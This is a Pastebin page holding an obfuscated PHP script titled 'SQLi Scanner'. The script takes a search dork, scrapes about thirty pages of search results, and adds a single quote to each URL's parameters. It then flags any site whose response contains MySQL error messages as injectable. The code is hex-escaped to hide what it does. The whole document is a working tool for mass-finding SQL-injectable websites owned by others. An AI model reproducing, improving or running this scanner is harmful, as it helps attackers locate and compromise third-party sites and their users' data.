API tools faq
paste
theowneral

SQLi Scanner.php

theowneral
May 17th, 2013
107
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 9.76 KB | None | 0 0
raw download clone embed print report
  1. <?php ${"\x47\x4c\x4fB\x41\x4cS"}["x\x6bu\x73rld"]="i\x64";echo "<h\x74\x6d\x6c\x3e\n<hea\x64>\n<\x74\x69\x74\x6ce>SQ\x4c\x69\x20\x53\x63\x61nner / P\x72\x6fco\x64\x65rz\x3c/titl\x65\x3e\n\x3c\x6c\x69\x6ek\x20\x72e\x6c\x3d\x22\x53\x48\x4fR\x54CUT\x20\x49\x43O\x4e\" href=\x22\x68\x74tp://i.i\x6d\x67\x75\x72.\x63\x6fm/\x42\x78A\x712\x2epng\x22>\n</he\x61d\x3e\n<b\x6fd\x79\x3e\n\n<\x73\x74y\x6ce>\n\x74e\x78\x74\x61r\x65\x61{ba\x63kgro\x75\x6ed-co\x6cor:\x231\x30\x357\x300\x3b\x63\x6f\x6c\x6fr:\x6cim\x65;font-wei\x67h\x74:\x62ol\x64\x3bf\x6f\x6e\x74-\x73\x69\x7ae: \x320\x70x;\x66on\x74-\x66\x61mily:\x20Tahom\x61\x3b \x62\x6f\x72d\x65r:\x20\x31px \x73oli\x64\x20#0\x30\x30000\x3b}\ni\x6e\x70u\x74{\x46ON\x54-\x57\x45IGH\x54:n\x6f\x72\x6da\x6c;b\x61\x63\x6b\x67\x72\x6fu\x6ed-\x63\x6flor:\x20#1\x305700\x3bfon\x74-\x73ize:\x201\x35\x70\x78;\x66\x6fnt-we\x69g\x68t:bo\x6cd\x3bco\x6c\x6f\x72:\x20\x6ci\x6de; \x66\x6fn\x74-\x66\x61\x6dil\x79:\x20\x54\x61\x68om\x61;\x20b\x6f\x72de\x72: \x31\x70x\x20\x73\x6f\x6cid \x236\x36666\x36;heig\x68t:2\x30}\n\x3c/st\x79\x6ce>\n\n<bo\x64y \x73ty\x6c\x65\x3d\"\x62a\x63kg\x72\x6f\x75\x6ed-im\x61g\x65: \x75rl(\x27\x68tt\x70://i.\x69mg\x75r\x2e\x63\x6fm/d\x41p\x52\x4e\x2ejp\x67'); b\x61\x63kgr\x6fu\x6e\x64-re\x70\x65\x61t: \x72e\x70eat\x3b\x20b\x61\x63k\x67ro\x75n\x64-pos\x69ti\x6f\x6e: \x63\x65\x6e\x74\x65\x72; b\x61ck\x67roun\x64-\x61tt\x61c\x68\x6d\x65n\x74: \x66\x69\x78e\x64\x3b\">\n \n<c\x65nt\x65\x72>\n<im\x67 \x73\x72c=\x22h\x74t\x70://i.i\x6d\x67\x75\x72\x2ec\x6fm/\x43l\x54\x52\x64\x2epng\"\x3e\x3cb\x72>\n<\x66o\x6et\x20c\x6f\x6c\x6fr\x3d\x22g\x72\x65e\x6e\x22\x20s\x69ze=\"\x35\x22\x3e\n\x3c\x62\x3eO\x6e\x6c\x69n\x65 SQLi Scan\x6ee\x72\x20\x50ow\x65red \x62\x79 <\x61\x20\x68ref=\"ht\x74p://w\x77\x77\x2epro\x63\x6fder\x7a\x2e\x63\x6fm\">Pr\x6fc\x6fde\x72z \x54eam\x20A\x6cbania\x6e\x20\x3c/b\x3e\x3c/\x61\x3e\x3c\x62r>\n\x7e\x20: <im\x67\x20s\x72\x63=\x22\x68ttp://i.\x69mgur.\x63\x6f\x6d/7n9x\x37.pn\x67\" h\x65\x69g\x68\x74=\x35\x30>\x20: ~<br\x3e\x3c\x68r\x20co\x6c\x6f\x72\x3d\"g\x72\x65en\x22>\n\x3cfon\x74 \x63\x6fl\x6fr=\x22\x67\x72een\x22 s\x69z\x65\x3d\"4\">\x3cb>&\x6ft\x69mes; </\x62>\x3c/\x66\x6fn\x74\x3e<a\x20href=\"\x68\x74\x74\x70://ww\x77.pa\x73te.\x74o/M\x54Q\x32\x4e\x6a\x49\x33NA\x3d=\"\x3e<\x66ont co\x6co\x72\x3d\"\x23F\x46FFFF\"\x20\x66\x6fnt\x20\x73iz\x65=\x22\x34\">D\x6f\x72k\x20\x4c\x69s\x74 1</fo\x6e\x74></\x61>\x3c/\x73t\x72ong> \n\x3cb><\x66\x6f\x6e\x74 \x63ol\x6f\x72\x3d\x22g\x72\x65en\"\x20s\x69z\x65\x3d\"\x35\x22\x3e\x20|\x20\x3c/f\x6f\x6e\x74></b>\n\x3ca \x68\x72e\x66\x3d\"\x68\x74tp://\x77\x77w.\x70a\x73te\x2et\x6f/\x4dT\x51\x32\x4ejM3Nw\x3d=\"><\x66\x6fnt \x63o\x6c\x6f\x72=\x22#\x46\x46F\x46\x46\x46\x22\x20fo\x6et si\x7ae=\"\x34\"\x3eD\x6frk Li\x73\x74 2</\x66ont\x3e</a\x3e</\x73\x74\x72on\x67> \n\x3c\x62\x3e\x3cfo\x6e\x74 \x63o\x6cor=\x22gre\x65n\" s\x69\x7a\x65=\"\x35\x22>\x20|\x20</\x66ont\x3e\x3c/\x62\x3e\n\x3c\x61\x20\x68\x72\x65f\x3d\"h\x74t\x70://\x77ww\x2e\x70\x61st\x65\x2e\x74\x6f/M\x54\x51\x32NjM5M\x51=\x3d\x22><\x66on\x74\x20\x63olo\x72=\"#\x46\x46F\x46FF\"\x20\x66o\x6et\x20size\x3d\x22\x34\x22>\x44\x6fr\x6b \x4ci\x73t \x33\x3c/fo\x6e\x74\x3e\x3c/a\x3e\x3c/\x73\x74r\x6f\x6eg>\n<fon\x74 \x63\x6f\x6cor\x3d\x22g\x72e\x65\x6e\x22 s\x69\x7ae=\x22\x34\x22><\x62\x3e\x26\x6ftime\x73\x3b\x3c/b\x3e\x3c/\x66\x6fnt>\n<h\x72 c\x6f\x6cor\x3d\"\x67\x72\x65e\x6e\x22>\n\x3cf\x6frm \x6d\x65\x74ho\x64\x3d\"pos\x74\x22 \x61\x63ti\x6fn\x3d\"\">\n\x3cfo\x6et\x20c\x6f\x6cor='gre\x65n' f\x6f\x6et \x73iz\x65\x3d'\x34\x27\x3eD\x6frk</\x66o\x6e\x74> :\x20\x3c\x69nput \x74y\x70e\x3d\"\x74e\x78\x74\x22\x20\x76al\x75\x65\x3d\x22ind\x65x\x2e\x70hp?\x69d\x3d\x31\x22\x20\x6eame=\"\x64o\x72\x6b\x22 si\x7a\x65\x3d\"\x320\x22/\x3e\n<inp\x75t t\x79\x70\x65\x3d\x22subm\x69\x74\" \x6e\x61\x6de\x3d\"s\x63a\x6e\"\x20val\x75\x65=\x22S\x63a\x6e\">\n<h\x72 \x77\x69\x64t\x68\x3d\x22\x325\x25\">\n\x3c/\x66\x6frm\x3e\n</\x63\x65\x6et\x65\x72\x3e\n\x20\n";${"\x47\x4cOBAL\x53"}["\x65v\x72\x75f\x67\x77\x6e"]="c\x75\x72\x6c";${"\x47\x4c\x4f\x42ALS"}["\x6e\x71fgt\x79"]="\x64\x6frk";${"\x47\x4c\x4fB\x41\x4c\x53"}["\x6bjqu\x6d\x67"]="s\x65c";${"\x47\x4cOB\x41\x4c\x53"}["pl\x73\x6dzi"]="re\x73u\x6c\x74";${"\x47L\x4fB\x41\x4cS"}["\x68ip\x78\x6d\x70\x77f\x6b\x63\x71"]="\x75\x72l";${"\x47L\x4f\x42A\x4c\x53"}["\x73\x72b\x6b\x70\x75\x72\x78f\x70"]="\x73\x69t\x65";ob_start();${"\x47LOBA\x4cS"}["\x6e\x75z\x71\x73ke\x6c"]="\x66i\x72s\x74";${"\x47\x4c\x4fBA\x4cS"}["\x70zq\x77\x68v\x77\x7ajck"]="\x70a\x67e";${"\x47\x4c\x4fB\x41\x4cS"}["\x67upi\x6f\x74\x77o"]="\x47\x45T";${"\x47\x4cOBA\x4c\x53"}["\x79\x67\x76wi\x7a\x72\x66se\x79c"]="r\x65\x67";set_time_limit(0);if(isset($_POST["scan"])){${"\x47L\x4f\x42\x41LS"}["\x61\x65h\x73\x78\x77\x7a"]="reg";$pghoegk="\x66irs\x74";${$pghoegk}="\x73t\x61rt\x67oo\x67\x6ce.sta\x72t\x70a\x67\x69na\x2e\x6e\x6c/\x69\x6e\x64\x65\x78\x2ep\x68p?\x71=";${${"GLOB\x41\x4cS"}["\x6b\x6a\x71u\x6d\x67"]}="\x26sta\x72\x74\x3d";${${"GLO\x42\x41\x4cS"}["\x61\x65\x68\x73\x78\x77z"]}="/\x3cp \x63la\x73s\x3d\"g\"><a\x20hr\x65\x66=\x22(.*)\x22 ta\x72g\x65t\x3d\x22_\x73elf\" on\x63l\x69\x63\x6b\x3d\"/";for(${${"G\x4c\x4fB\x41\x4cS"}["\x78\x6b\x75srld"]}=0;${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x6b\x75s\x72l\x64"]}<=30;${${"G\x4cO\x42A\x4c\x53"}["\x78k\x75\x73\x72\x6c\x64"]}++){$bhmfwjepqfj="\x6d\x61\x74ch\x65\x73";$hylumkyoblkk="\x6d\x61\x74\x63\x68\x65\x73";${${"\x47\x4cOB\x41\x4cS"}["\x70\x7a\x71w\x68\x76wz\x6a\x63k"]}=${${"\x47L\x4f\x42\x41\x4c\x53"}["x\x6b\x75srl\x64"]}*10;${"GL\x4fB\x41\x4cS"}["\x61a\x76\x71\x70\x78\x65g\x66\x65\x6ao"]="\x73\x65\x63";${"G\x4c\x4f\x42\x41\x4c\x53"}["\x66\x79\x61\x76w\x6c\x76\x70\x63\x75\x70"]="\x63\x75r\x6c";${"\x47\x4cOB\x41L\x53"}["\x6c\x77\x71\x73\x6b\x61\x65\x6e\x6e\x6a\x66"]="\x70a\x67\x65";${${"G\x4cO\x42ALS"}["\x6e\x71\x66g\x74\x79"]}=urlencode($_POST["d\x6fr\x6b"]);${"\x47\x4c\x4f\x42\x41LS"}["\x6b\x6ds\x74\x67\x6fo\x78\x76lg"]="\x75r\x6c";${${"\x47\x4c\x4f\x42\x41L\x53"}["h\x69\x70\x78\x6d\x70w\x66\x6bc\x71"]}=${${"GL\x4fB\x41\x4c\x53"}["n\x75\x7a\x71\x73\x6b\x65\x6c"]}.${${"GL\x4fB\x41\x4c\x53"}["\x6eq\x66\x67ty"]}.${${"G\x4cOB\x41\x4c\x53"}["aa\x76\x71p\x78\x65\x67\x66e\x6a\x6f"]}.${${"\x47\x4c\x4fB\x41L\x53"}["l\x77q\x73\x6ba\x65nn\x6a\x66"]};${${"G\x4c\x4f\x42A\x4c\x53"}["\x66\x79\x61v\x77\x6c\x76\x70c\x75\x70"]}=curl_init(${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["km\x73\x74g\x6f\x6f\x78vl\x67"]});curl_setopt(${${"\x47\x4cO\x42A\x4cS"}["e\x76\x72\x75f\x67\x77\x6e"]},CURLOPT_RETURNTRANSFER,1);curl_setopt(${${"\x47L\x4fBA\x4cS"}["\x65v\x72\x75f\x67\x77n"]},CURLOPT_USERAGENT,"M\x6fzill\x61/5.0 (W\x69\x6e\x64o\x77s\x3b\x20U\x3b\x20Wi\x6ed\x6fw\x73\x20N\x54 5.\x31\x3b t\x72;\x20rv:1\x2e9.\x32\x2e12)\x20Ge\x63\x6b\x6f/\x32\x30101\x30\x326 \x46i\x72\x65f\x6fx/3\x2e\x36.1\x32\x20( .\x4e\x45\x54 CL\x52\x20\x33.\x35.307\x329\x3b .N\x45T\x34.0\x45)");$fsfedsh="\x63\x75rl";${${"G\x4cOB\x41\x4c\x53"}["\x70l\x73mz\x69"]}=curl_exec(${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x65v\x72\x75f\x67\x77n"]});curl_close(${$fsfedsh});preg_match_all(${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x79g\x76\x77\x69zr\x66\x73\x65\x79\x63"]},${${"GL\x4f\x42\x41\x4c\x53"}["\x70ls\x6d\x7a\x69"]},${$bhmfwjepqfj});foreach(${$hylumkyoblkk}[1]as${${"\x47L\x4f\x42\x41L\x53"}["\x73\x72\x62\x6b\x70urx\x66\x70"]}){${"\x47\x4c\x4f\x42\x41\x4cS"}["sl\x6c\x67wo\x71\x71\x63\x64"]="\x63u\x72l";${${"G\x4c\x4f\x42\x41\x4cS"}["\x68i\x70\x78\x6dp\x77\x66\x6b\x63\x71"]}=preg_replace("/\x3d/","\x3d'",${${"G\x4c\x4fB\x41\x4c\x53"}["s\x72\x62kp\x75\x72x\x66\x70"]});$phksqtvcjju="c\x75\x72\x6c";${${"G\x4c\x4fB\x41\x4cS"}["ev\x72\x75\x66gw\x6e"]}=curl_init();curl_setopt(${${"\x47\x4cO\x42A\x4c\x53"}["s\x6cl\x67\x77\x6fq\x71\x63\x64"]},CURLOPT_RETURNTRANSFER,1);curl_setopt(${${"G\x4cO\x42A\x4c\x53"}["\x65\x76\x72\x75\x66\x67wn"]},CURLOPT_URL,${${"\x47L\x4fB\x41\x4cS"}["\x68\x69\x70\x78\x6dp\x77f\x6bc\x71"]});${"\x47\x4c\x4f\x42A\x4c\x53"}["\x61nta\x74z\x72\x6f\x75"]="c\x75r\x6c";$onqhfunejek="c\x75\x72\x6c";curl_setopt(${${"\x47\x4cO\x42\x41\x4cS"}["\x61\x6e\x74\x61\x74\x7a\x72\x6fu"]},CURLOPT_USERAGENT,"Mo\x7a\x69l\x6c\x61/5.0\x20(W\x69ndo\x77s\x3b U;\x20W\x69n\x64\x6fws\x20\x4e\x54 \x35\x2e\x31;\x20\x74r;\x20r\x76:\x31.\x39\x2e2.12) \x47ecko/20101\x3026\x20\x46i\x72\x65f\x6fx/3\x2e6\x2e\x31\x32\x20( .\x4e\x45\x54 \x43\x4c\x52 3\x2e5.\x33\x30\x3729\x3b .N\x45\x544\x2e\x30E)");curl_setopt(${$phksqtvcjju},CURLOPT_TIMEOUT,"5");${"\x47L\x4f\x42\x41L\x53"}["z\x62\x61\x6d\x6dl\x6c"]="\x47\x45\x54";${${"G\x4c\x4f\x42\x41\x4c\x53"}["gu\x70i\x6ft\x77o"]}=curl_exec(${$onqhfunejek});if(preg_match("/\x65\x72ror\x20\x69\x6e\x20\x79our SQL\x20sy\x6et\x61\x78|\x6dy\x73\x71l_f\x65tch_arr\x61\x79()|\x65xecu\x74\x65 \x71u\x65ry|\x6d\x79\x73\x71l\x5ff\x65t\x63h_o\x62\x6a\x65c\x74()|m\x79\x73q\x6c\x5f\x6e\x75m\x5f\x72\x6fw\x73()|\x6dy\x73ql_\x66\x65\x74c\x68\x5f\x61ss\x6fc()|m\x79\x73\x71l_fe\x74ch&\x23\x38\x3203\x3b\x5f\x72\x6fw()|S\x45\x4c\x45CT\x20*\x20\x46\x52\x4fM|s\x75\x70pli\x65d a\x72g\x75\x6dent \x69\x73\x20not\x20\x61 \x76al\x69d\x20\x4dyS\x51\x4c|\x53\x79\x6e\x74ax\x20e\x72ror|Fat\x61\x6c\x20\x65rr\x6f\x72/i",${${"\x47L\x4fB\x41\x4c\x53"}["\x7a\x62\x61\x6d\x6dl\x6c"]})){${"G\x4cO\x42\x41\x4c\x53"}["\x70\x64rnjn\x63\x67rr"]="\x75r\x6c";echo"<c\x65n\x74e\x72>\x3c\x62\x3e\x3cf\x6fn\x74 \x63o\x6co\x72\x3d\"#E1\x300\x30\x30\x22\x20fo\x6e\x74\x20\x73i\x7ae\x3d\x33\x3e\x46\x6fun\x64 : <a h\x72e\x66\x3d\x22".${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["hipxmp\x77f\x6bcq"]}."\"\x3e".${${"G\x4cO\x42\x41\x4c\x53"}["pdr\x6ejnc\x67\x72\x72"]}."\x3c/a\x3e</b\x3e</\x66\x6fn\x74\x3e\x3c/\x63\x65\x6et\x65\x72>";ob_flush();flush();}else{${"G\x4cOBA\x4c\x53"}["\x73l\x72j\x69\x6d\x62tp"]="\x75r\x6c";echo"<c\x65\x6eter\x3e\x3cfont c\x6flo\x72=\"\x231\x30\x38\x370\x65\x22\x20\x66\x6f\x6et\x20s\x69ze\x3d\x33><\x62\x3e".${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x73lr\x6a\x69\x6d\x62\x74p"]}."\x3c/\x62>\x3c/fon\x74></\x63\x65\x6e\x74\x65\x72>";ob_flush();flush();}ob_flush();flush();}ob_flush();flush();}ob_flush();flush();}echo "\n</b\x6f\x64\x79>\n\x3c/\x68tm\x6c>";
  2. ?>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!